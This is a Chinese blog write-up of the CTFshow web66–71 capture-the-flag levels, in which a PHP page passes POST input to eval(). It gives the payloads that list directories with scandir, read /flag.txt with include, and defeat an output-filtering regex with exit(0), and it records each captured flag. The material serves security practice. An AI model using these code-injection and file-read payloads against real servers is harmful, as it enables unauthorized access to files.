CTFshow web66 67 68 69 70 71

已于 2022-11-16 18:18:32 修改
阅读量832 收藏
点赞数 1
分类专栏: CTF 命令执行 渗透测试 文章标签: php 网络安全 web安全
于 2022-11-13 20:19:11 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40345591/article/details/127835990
版权
渗透测试 同时被 3 个专栏收录
49 篇文章 4 订阅
订阅专栏
CTF
16 篇文章 0 订阅
订阅专栏
命令执行
10 篇文章 2 订阅
订阅专栏

目录

web66

代码分析:

 flag:

web67

flag:

web68 

flag: 

web69

payload:

flag:

web70

flag:

web71

代码分析:

flag:

web66

代码分析:

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}

跟前面几道题一样啊

直接highlight_file("flag.php")一下

不让秀了,看来flag给藏起来啦

想到前面的print_r + scandir 可以看目录

尝试print_r(scandir(".")); 

看起来flag不在这个目录里,那看一下上层目录 print_r(scandir("/"));  

找到啦,直接highlight/include一下

 flag:

ctfshow{820da674-4e2c-4744-911a-9a24f8efe1f8}

web67

代码是一样的,只不过把print_r禁用了,直接var_dump,是一样的

var_dump(scandir("/"));

还是flag.txt

c=include("/flag.txt");

 

flag:

 ctfshow{fa15284b-dcc9-48e3-a7a2-840273bd57dc}

web68 

代码应该跟前几题一样,但是呢把highlight禁用了,所以代码都展示不出来,直接报错

不过小问题,还是先看看有没有flag.txt

var_dump(scandir("/"));

有flag.txt,下面就是读出来,最简单的方法就是include

flag: 

ctfshow{2b361051-a3b6-491b-b6ba-94ba581f4457}

web69

这道题,把var_dump禁用了,但是scandir没禁用,还是想用它,尝试创建一个变量,然后用echo输出

payload:

c=$a=(scandir("/"));echo $a[6];

正好第六个就是flag.txt

 然后直接include就可以啦

c=include("/flag.txt");

flag:

ctfshow{507a8af5-1cc0-4738-bdb5-a9000ee58420} 

web70

我也不想秀啊,但是它让我上天哎

解法跟上一道题一样

flag:

ctfshow{bae94411-7c87-4534-97f3-abbef515efbd}

web71

这一关一样看不了源码,但是给了个下载连接,可以下载了看

代码分析:

if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
        $s = ob_get_contents();
        ob_end_clean();
        echo preg_replace("/[0-9]|[a-z]/i","?",$s);
}else{
    highlight_file(__FILE__);
}

查了一下,就是不直接输出结果,把结果放到缓冲区里,这里其实就是把结果做了一下正则匹配,把数字和字母变成了?,其实也好解决,直接exit(0)退出即可

其他的和上一题一样

c=$a=(scandir("/"));echo $a[6];exit(0);

c=include("/flag.txt");exit(0);

flag:

ctfshow{e0571c72-4d67-47c0-8f24-38c2abf9a766} 

白帽Chen_D
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
CTFshow 命令执行 web66
Kradress的博客
12-03 319
目录源码思路题解总结 源码 <?php /* # -*- coding: utf-8 -*- # @Author: Lazzaro # @Date: 2020-09-05 20:49:30 # @Last Modified by: h1xa # @Last Modified time: 2020-09-07 22:02:47 # @email: h1xa@ctfer.com # @link: https://ctfer.com */ // 你们在炫技吗? if(isset($_POST
CTFshow 命令执行 web68
Kradress的博客
12-04 333
目录源码思路题解总结 源码 Warning: highlight_file() has been disabled for security reasons in /var/www/html/index.php on line 19 思路 根据提示,源码中可能存在highlight_file()函数,然后在php.ini中禁用了highlight_file().源码应该还是上题的. include和require能执行文件中的代码,因为flag不是php代码,所以只能以文本的形式显示 题解 发现
ctfshow web66
m0_69289738的博客
09-20 93
var_dump(scandir('.'))查看当前的目录。发现代码是可以执行的,但是flag文件不在这。先尝试一下highlight_file()发现目标文件,直接访问得flag。
ctfshow 框架复现
最新发布
akdelt的博客
05-05 393
又出现 debug 页面了。而且还得换 RCE9。Laravel RCE3 用不了了,我们用 4。生成后发现不行,反序列化结果会被调试页面覆盖。我们已经知道原理了,直接工具打吧。生成链子,这里我们用 RCE3。然后访问 1.txt 就行了。查看各种应用各种版本的链子。写一个脚本遍历所有 rce。快一点吧直接工具梭哈了。但是没有回显,写🐎进去。然后访问 1.txt。
ctfshow命令执行 web入门 web64-68
m0_62207170的博客
04-08 213
ctfshow命令执行 web入门 web64-68
CTFshow web入门 web56~web70 命令执行
qq_56815564的博客
04-18 605
这回倒好,直接告诉你不能用highlight_file()了,根据上面一堆题目的源码,可以明确的一点就是else里的那个highlight_file()被禁用的原因才导致的报错,即不能使用highlight_file()事先说明一下,eval函数的作用是获取返回值,所以传入导eval中的数据需要是一个有返回值的函数,要不就是一段小程序也行。再次发现根目录下的,flag.txt,直接进得到。
CTFSHOW web193 left标注盲注脚本
05-04
这段代码是一个用于获取某个网站的 flag 的脚本。它使用了 SQL 注入漏洞来获取 flag。具体来说,它通过构造 SQL 语句的方式,逐个字符地获取 flag。其中,它通过修改注入语句中的 payload 变量,来获取不同的信息,...
ctfshow web184 正则爆破脚本0x16进制
10-21
ctfshow web184 正则爆破脚本0x16进制
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
CTFSHOW web183 正则爆破脚本
10-21
CTFSHOW web183 正则爆破脚本
ctfshow web189 无单引号,利用回显不同,盲注
10-21
ctfshow web189 无单引号,利用回显不同,盲注
ctfshow web入门之命令执行
uuzfumo的博客
12-17 1078
命令执行姿势
《CTFshow-Web入门》08. Web 71~80
学习学习学习......
05-05 1805
eval() 利用,ob_end_clean() 绕过,正则绕过、PHP 垃圾回收机制,伪协议 {glob://}、PDO 利用、FFI 利用、include() 利用、伪协议 {php://},{data://}、一句话木马之 Nginx 日志利用。
渗透学习-CTF篇-web-CTFshow(仅有部分,持续更新中,254-259关))
qq_43696276的博客
03-20 1231
本文将主要介绍CTFshow的关卡攻略,至于基本的原理请参考本人的其他介绍漏洞原理的博客。
ctfshow终极考核 web66⑥-web669
羽的博客
01-03 1143
配合脚本学习效果更好 web666 可以先看下668 先通过js rce ,然后又拿的flag,flag在数据库中 web667 扫描端口可以找到 3000端口 flag_667=ctfshow{503a075560764e3d116436ab73d7a560} web668 通过jade原型链污染写入一个nodejs,并且运行 jade原型链污染可以看下这篇文章 https://blog.csdn.net/miuzzx/article/details/111780832 写入的nodejs内容如下 var
CTFshow web入门 web71~web77 web118~web122 web124 命令执行
qq_56815564的博客
04-21 724
在RANDOM中产生的随机数可以是1、2、3、4、5这个5个数,但1,2,3这三个出现的概率很低,所以基本上是4或5,因此如果要使用RANDOM的话其实也有碰运气的成分在里面,没准就撞到了正确的数。回到构造 4 这个字符上,再Linux中,${#xxx}显示的是这个数值的位数,而如果不加 # 的话就是显示这个数原本的值,比如12345再加上#后就是5。像 /bin/cat flag.php 之类的也是可以的,这个只需要构造一个 t 和 / 就行了,构造出来的长度也短一些。
CTFshow-命令执行
weixin_44770698的博客
06-25 2681
ctfshow-web 命令执行
ctfshow-web命令执行(web61-77;118-124)(Updating)
m0_50268414的博客
11-30 2704
ctfshow-web命令执行(web61-77;118-124) 文章目录ctfshow-web命令执行(web61-77;118-124)web66 print\_r(scandir())与highlight\_file()web68 includeweb69 exit() web66 print_r(scandir())与highlight_file() 题目描述 show_source('flag.php'); 该语句被过滤 题解 POST传入c=print_r(scandir(’/’)); 获得
ctfshow学习记录-web入门(命令执行59-68
龟速更新的九某人
06-13 342
ctfshow学习记录-web入门(命令执行web59-68
ctfshow web70
08-23
根据引用和引用,CTFShow的Web题目中的“ctfshow web70”是指Web题目中的第70个题目。具体的内容可能涉及到禁用了一些函数,并提供了一个POST数据包的POC示例。然而,关于题目的具体内容和解法原理,需要查看引用中...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

白帽Chen_D

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值